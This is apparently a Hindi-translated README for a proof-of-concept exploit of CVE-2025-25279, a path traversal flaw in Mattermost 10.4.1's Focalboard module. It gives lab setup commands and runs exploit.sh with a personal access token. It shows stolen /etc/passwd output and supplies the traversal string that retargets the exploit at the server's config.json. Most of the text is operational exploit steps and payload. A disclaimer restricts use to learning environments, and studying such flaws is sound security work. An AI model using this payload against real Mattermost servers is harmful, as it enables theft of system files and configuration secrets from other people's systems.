
CVE-2025-25279 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Mattermost 10.4.1 के Focalboard मॉड्यूल में पाथ ट्रैवर्सल कमजोरी है, जो प्रमाणित उपयोगकर्ताओं को तैयार किए गए अटैचमेंट के माध्यम से मनमानी फाइलों को बाहर निकालने में सक्षम बनाता है।
यह प्रूफ ऑफ कॉन्सेप्ट CVE-2025-25279 भेद्यता के शोषण को प्रदर्शित करता है जो Mattermost 10.4.1 को प्रभावित करती है।
Focalboard (बोर्ड प्रबंधन मॉड्यूल) में एक दोष अटैचमेंट में पथ ट्रैवर्सल के माध्यम से फ़ाइलों का मनमाना पठन की अनुमति देता है।
शोषण निम्नलिखित को बहिर्वहित करने की अनुमति देता है:
/etc/passwd/etc/groupopt/mattermost/config/config.jsonयह हमला केवल प्रमाणित उपयोगकर्ता खाते के साथ कमजोर परिदृश्यों में काम करता है।
target/ फ़ोल्डर शामिल नहीं है (GitHub के लिए बहुत बड़ा)।
मैन्युअल रूप से डाउनलोड करें: https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
पहले target निर्देशिका में जाएं और यह करें:
cd target
make mattermost.box
सुनिश्चित करें कि आपके पास mattermost-poc बॉक्स है अन्यथा VM काम नहीं करेगा:
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
cd live/vm1
vagrant up
VM से कनेक्ट करें
vagrant ssh
खोलें: http://localhost:8065
प्रोफ़ाइल --> Security --> Personal Access Tokens
होस्ट मशीन से:
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
./exploit.sh
आपसे पूछा जाएगा:
PAT (Personal Access Token) :
👉 किसी Mattermost उपयोगकर्ता का वैध PAT दर्ज करें।
📸 आउटपुट उदाहरण (/etc/passwd का बहिर्वहन)
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
लक्षित फ़ाइल: config.json
Mattermost की संवेदनशील फ़ाइल को लक्षित करने के लिए:
exploit.sh स्क्रिप्ट के शीर्ष पर संशोधित करें:
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
शोषण तब config.json फ़ाइल की सामग्री प्रदर्शित करेगा।
🟢 MAHAMMAD MOUSSE Abokor 🔵 PARNET cyril
🎬 वीडियो प्रदर्शन
👉 एक पूर्ण वीडियो प्रदर्शन यहाँ स्थित है: live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 नोट्स
यह PoC कड़ाई से सीखने के वातावरण के लिए है। शैक्षणिक संदर्भ के बाहर या बिना अनुमति के कभी उपयोग न करें।